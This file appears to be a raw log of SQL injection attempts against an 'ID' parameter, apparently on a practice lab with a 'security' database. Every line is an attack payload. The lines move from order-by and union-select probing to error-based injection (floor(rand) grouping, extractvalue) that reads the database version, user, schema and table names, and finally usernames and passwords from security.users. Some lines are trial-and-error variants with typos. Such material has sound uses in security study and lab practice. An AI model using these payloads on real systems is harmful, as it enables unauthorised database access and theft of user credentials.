ID:1
ID:1
ID:1\' order by 1-- 
ID:1\' order by 2-- 
ID:1\' order by 4-- 
ID:1\' order by 4--  
ID:1\' order by 10--  
ID:1\' order by 10 -- 
ID:1\' order by 10\' -- 
ID:1\' order by 10--  
ID:1\' order by 10--  
ID:2\' order by 10--  
ID:2\' order by 10 --  
ID:2\' order by 10-- 
ID:2\' order by 10-- 
ID:2\'order by 10-- 
ID:2\'order by 4-- 
ID:2\'order by 4-- 
ID:2\' order by 4-- 
ID:1\' order by 10--  
ID:2\' order by 4-- 
ID:2\' order by 4-- 
ID:21\' union select 1,2,(databases())-- 
ID:21\' union select 1,2,3-- 
ID:21\' union select 1,2,3 -- 
ID:2\' union select 1,2,3 -- 
ID:2 \' union select 1,2,3 -- 
ID:2 \' union select 1,2,3\'-- 
ID:2 \' union select 1,2,3 -- 
ID:2 \' union select 1,2,3- - 
ID:2 \' union select 1,2,3 --
ID:2 \' union select 1,2,3  --
ID:2\' union select 1,2,3 --
ID:2\' union select 1,2,3 -- 
ID:2\' union select 1,2,3 -- 
ID:2\' union select 1,2,3 -- 
ID:2\' union select 1,2,3-- 
ID:2\' union select 1,2,3-- 
ID:2\' union select 1,2,3-- 
ID:2\' union select 1,2,3-- 
ID:1\' order by 4-- 
ID:1\' order by 10-- 
ID:12\' union select 1,2,3-- 
ID:0000\' union select 1,2,3-- 
ID:2\'order by 4-- 
ID:1\' order by 4  
ID:
ID:1\' order by 4-- 
ID:2\'
ID:2\'
ID:2'
ID:2' order by 4-- 
ID:213' union select 1,2,(databese())-- 
ID:2'order by 4-- 
ID:2'
ID:2' and select count(*)from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2))
ID:2' and select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2))
ID:2' and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))
ID:2' and (select count(*) from information_schema.tables group by concat((select version() limit 0,1),0x7e,floor(rand(0)*2)))
ID:2' and (select count(*) from information_schema.tables group by concat((select version() limit (0,1)),0x7e,floor(rand(0)*2)))
ID:2' and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))
ID:2' and (select count(*) from information_schema.tables group by concat((select user()),0x7e,floor(rand(0)*2)))
ID:2' and (select count(*) from information_schema.tables group by concat((select users()),0x7e,floor(rand(0)*2)))
ID:2' and select extractvalue(1,concat(0x7e,(select user()),0x7e))-- 
ID:2' and select extractvalue(1,concat(0x7e,(select user() limit 0,1),0x7e))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select users()),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select database()),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select version()),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select schema_name from information_schema.schemata),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select schema_name from information_schema.schemata limit 0,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select schema_name from information_schema.schemata limit 1,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select schema_name from information_schema.schemata limit 2,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select schema_name from information_schema.schemata limit 3,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand(0)*2)))-- 
ID:2' union select schema_name from information_schema.schemata-- 
ID:-1' union select schema_name from information_schema.schemata-- 
ID:-1' union select database()
ID:-1' union select database()-- 
ID:-1' union select 1,2,database()-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select schema_name from information_schema.schemata limit 4,1),0x7e,floor(rand(0)*2)))-- 
ID:-1' union select 1,2,database()-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema='security';),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema='security'),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema='security' limit 2,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select group_concat(users,password) from security.users),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select group_concat(user,password) from security.users),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select group_concat(username,password) from security.users),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select (username,password) from security.users limit 0,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select (username,password) from security.users limit 1,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select (username,password) from security.users limit 2,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select (username,password) from security.users ),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select (username,password) from security.users ),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select substr( concat(username,password),1,4) from security.users ),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select substr( concat(username,password),1,2) from security.users ),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select substr( concat(username,password),1,3) from security.users ),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select  concat(username,password) from security.users ),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select username from security.users ),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select substr(username,1,3) from security.users ),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select substr(concat(password)1,3) from security.users limit0,1),0x7e,floor(rand(0)*2)))-- 
ID:2' and (select count(*) from information_schema.tables group by concat((select substr(password,1,3) from security.users limit0,1),0x7e,floor(rand(0)*2)))-- 
